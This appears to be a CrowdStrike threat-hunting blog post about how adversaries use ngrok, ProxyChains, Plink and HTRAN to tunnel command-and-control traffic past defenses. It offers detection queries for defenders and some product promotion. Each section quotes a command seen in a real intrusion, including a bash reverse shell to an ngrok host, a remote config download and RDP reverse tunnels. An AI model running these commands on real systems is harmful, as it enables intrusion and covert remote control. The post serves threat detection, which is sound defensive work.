Walking Through Walls: Four Common Endpoint Tools Used to Facilitate Covert C2

Adversaries continue to find new and innovative ways to penetrate an organization’s defenses. Defenders who focus on plugging these holes can find themselves exhausted and frustrated. Hunting for adversarial defense evasion for the purpose of data exfiltration and command-and-control (C2), however, remains a good strategy.

Many adversaries leverage tooling to establish C2 or to enable successful data exfiltration, all while evading an organization’s defenses. The CrowdStrike Falcon® OverWatch team commonly sees the four tools discussed in this blog deployed at the endpoint to facilitate covert C2 and bypass defenses, such as corporate proxies.

Watch this short video to see how Falcon OverWatch proactively hunts for threats in your environment.

Ngrok Secure Tunnels

Ngrok Secure Tunnels are used legitimately by developers and IT professionals to manage various aspects of a network without needing to configure VPN, Firewall, DNS or other network security settings. If a local device has internet access, the ngrok agent can be installed. This allows an adversary to remotely connect via a ngrok Secure Tunnel to the ngrok service without having to change the local network or host security infrastructure configurations. Adversaries use this tool to bypass network defenses and establish their remote communications, which are typically encrypted.

Falcon OverWatch Observations

Falcon OverWatch has observed eCrime (SPIDER), hacktivist (JACKAL) and China-nexus (PANDA) actors use ngrok to evade target network protections from a data-exfiltration perspective.

In one intrusion, Falcon OverWatch observed an adversary exploit a PHP application vulnerability, then test the domain connectivity via nslookup. The adversary used ngrok to set up a remote TCP connection with their C2 domain. Below is a snippet of the reverse TCP shell the adversary set up via the ngrok Secure Tunnel:

sh -c 0 < sh -c bash -i > & /dev/tcp/2.tcp.ngrok.io/12150

Recommendations for Defenders

Look for instances of reverse shell connectivity via ngrok in your environment by specifying “commands,” “processes” or “DNS queries” containing tcp.ngrok.io, as seen in the following query:

event_simpleName IN (DnsRequest, ProcessRollup2, CommandHistory, ScriptControlScanInfo, SyntheticProcessRollup2) "tcp.ngrok.io"
| eval PrEx="https://falcon.crowdstrike.com/investigate/process-explorer.html" .aid. ".html" . TargetProcessId_decimal . "?_cid=" . cid
| table _time event_simpleName aid ComputerName event_platform ImageFileName CommandLine DomainName

ProxyChains

ProxyChains is a UNIX-based tool that legitimately forces any TCP connection made by any application on a given endpoint through a HTTP, SOCKS, TOR or other proxy protocol. This tool allows adversaries to bypass local authorized proxies and other network defenses, like firewalls. It instead allows connection directly to their C2 infrastructure via the forced ProxyChains configuration.

ProxyChains also enables an adversary to chain different unauthorized proxy connections together to further masquerade their communications. ProxyChains allows adversaries to use various native operating systems tools — such as FTP, SSH and NMAP — to communicate bilaterally with a local and remote host without being detected.

Falcon OverWatch Observations

Falcon OverWatch has observed eCrime adversaries use ProxyChains to proxy the download of tools needed to accomplish their actions on objectives while simultaneously avoiding detection. Once ProxyChains have been configured, they typically use CURL, WGET, SSH, FTP and other similar tools to obtain additional payloads necessary for adversaries to complete actions on objectives.

In one example, Falcon OverWatch observed an adversary using WGET to pull a remote proxychains.conf configuration file and write it locally to the victim organization’s proxy configuration file as seen below:

wget -q -O proxy1.conf http://////proxychains.conf

Recommendations for Defenders

Look for shell commands that indicate modification of the proxychains.conf file in your environment. This is where the actual proxy configurations will have to be set and thus are crucial for an adversary to configure for traffic to flow without being detected.

Defenders can also run the following Event Search query in their environment to detect interactions with ProxyChains configuration files. This query is vital to building known legitimate-use documentation if there are any instances that are legitimate.

event_simpleName IN (ProcessRollup2, ScriptControlScanInfo, ProcessRollup2Stats) CommandLine=*proxychains.conf*
| table _time event_simpleName aid ComputerName FileName CommandLine

Plink

Plink, which stands for PuTTY Link, is a legitimate command line tool used for automated operations, but it is also widely used by advanced adversaries as a tunneling tool to establish a persistent communication channel between the host and C2 infrastructure. Due to the tool’s capabilities, it can be used to bypass proxies and other network defenses.

Falcon OverWatch Observations

Falcon OverWatch observed an unknown adversary conducting malicious interactive activity on a Windows host following a likely successful web server compromise. The activity occurred beneath the Microsoft IIS worker process w3wp.exe, where the adversary deployed and subsequently executed a copy of the legitimate binary plink.exe that was used to establish a reverse shell to a remote IP.

During a separate intrusion, Falcon OverWatch observed an adversary perform RDP tunneling via SSH. The command line below shows a snippet of this activity. In this command, the adversary set the remote and local IPs for communication, enabled compression with the -C option, selected the specific SSH2 protocol and IPV4 with the -2 and -4 options respectively, then disable Pseudo-TTY (or PTY) allocation with the -T option. -N was used to prevent Plink setting up an SSH shell, -R set the listening host/port IP, -l and -pw set the username and password options respectively, and finally 2>&1 was used for setting standard output for errors.

cmd.exe /c "echo y| c:\users\public\Downloads\plink.exe  -P 443 -C -2 -4 -T -N -R 0.0.0.0:12313:127.0.0.1:3389 -l  -pw  2>&1

Recommendations for Defenders

Look for instances of reverse proxies that stem from plink.exe in your Windows environment. The query below investigates for the use of plink.exe where the listening port/ip has been set, which could indicate a reverse shell. Defenders should investigate further if this query produces results indicating that such activity is present.

event_simpleName IN (ProcessRollup2, SynthenticProcessRollup2) event_platform=Win
| regex CommandLine="((?i)(plink|plink.exe).+-R\s(?:<0-9>{1,3}\.){3}<0-9>{1,3})"
| rename ParentBaseFileName as ParentProcess, CommandLine as Command, ImageFileName as Path
| table _time ComputerName Path ParentProcess Command

HTRAN

HTRAN is a proxy tool popular with several PANDA actors who use it to relay malware C2 traffic, thereby obfuscating the true location of their collection servers. HTRAN can also be used to proxy TCP connections and bypass legitimate host and network defenses, allowing adversaries to better hide their communication tracks.

When the specifically configured HTRAN domain receives a connection attempt from the compromised host, it redirects it to the adversary’s server/host — hiding the true remote location of the C2 infrastructure. HTRAN achieves defense evasion by leveraging port forwarding to bypass network defenses. Adversaries then leveraging HTRAN can use standard protocols to communicate with infected systems over non-standard ports via forwarding.

Falcon OverWatch Observations

PANDA actors commonly use HTRAN to establish anonymous remote communications and bypass network proxy defenses in their target networks. Falcon OverWatch has seen variants of this tool being used by adversaries — including NATBypass, an implementation of HTRAN written in the Golang programming language — as recently as the beginning of 2022.

In a recent intrusion against a technology company, Falcon OverWatch observed HTRAN being used for network proxying of the adversary’s C2 communications after a Windows server was compromised. The adversary first performed enumeration commands on the server, then performed network discovery commands, before finally establishing a C2 proxy via HTRAN over RDP via the following command:

C:/programdata/lcx.exe -slave  20000 127.0.0.1 3389" 2>&1

Recommendations for Defenders

Falcon OverWatch commonly observes the use of HTRAN in the wild under two common binary names — lcx.exe or htran.exe — to achieve data transmission forwarding and defense evasion. The following three modes are supported for HTRAN:

  • The “-tran'' mode forwards the transmitted data to a particular address.
  • The “-listen” mode typically receives two port numbers in the command and makes the port binding while in an idle state. If the connection has applied this mode alongside the previous “-tran” mode, the data received from one port is forwarded to the other port.
  • The “-slave” mode connects directly to the designated address.

Based on this, the Event Search query seen below looks for the specific binaries using the above mentioned modes via command line and this does not account for renaming of HTRAN binaries.

event_simpleName IN (BMLFeatureData, ProcessRollup2)

| regex CommandLine="(?i)(.+(lcx\.exe|htran\.exe).+(-listen\s|-slave\s|-tran\s).+(?:<0-9>{1,3}\.){3}<0-9>{1,3})"

| rename aid as Host_ID, ComputerName as HostName

| table _time Host_ID HostName FileName CommandLine

This additional Event Search query seen below casts a wider net. It looks at all executables using these modes via command line. This can be good to enumerate and investigate, while also documenting the findings in your operational knowledge base despite the fact these results will include non-HTRAN activity.

event_simpleName IN (BMLFeatureData, ProcessRollup2)

| regex CommandLine="(?i)(.+\.exe.+(-listen\s|-slave\s|-tran\s).+(?:<0-9>{1,3}\.){3}<0-9>{1,3})"

| rename aid as Host_ID, ComputerName as HostName

| table _time Host_ID HostName FileName CommandLine

Although the tools mentioned above are some of the most common tools Falcon OverWatch observes adversaries leveraging to facilitate covert C2, this is by no means an exhaustive list. VPN usage, remote access tools, DNS tunneling, domain fronting and encryption are just some of the other techniques Falcon OverWatch has observed adversaries leverage to evade network defenses.

It is important that defenders know their network and establish baselines on all outbound network traffic. Defenders must also be cognizant of any deviations from their authorized software usage. This ensures that malicious activity masquerading as legitimate noise is detected and disrupted immediately.

See for yourself how the industry-leading CrowdStrike Falcon platform protects against modern threats like wipers and ransomware. Start your 15-day free trial today.

To deep dive into other tools Falcon OverWatch commonly observes, be sure to check out the Nowhere to Hide: 2022 Falcon OverWatch Threat Hunting Report. More about Falcon OverWatch and Falcon OverWatch Elite can also be found on the CrowdStrike website.

Additional Resources

Breaches Stop Here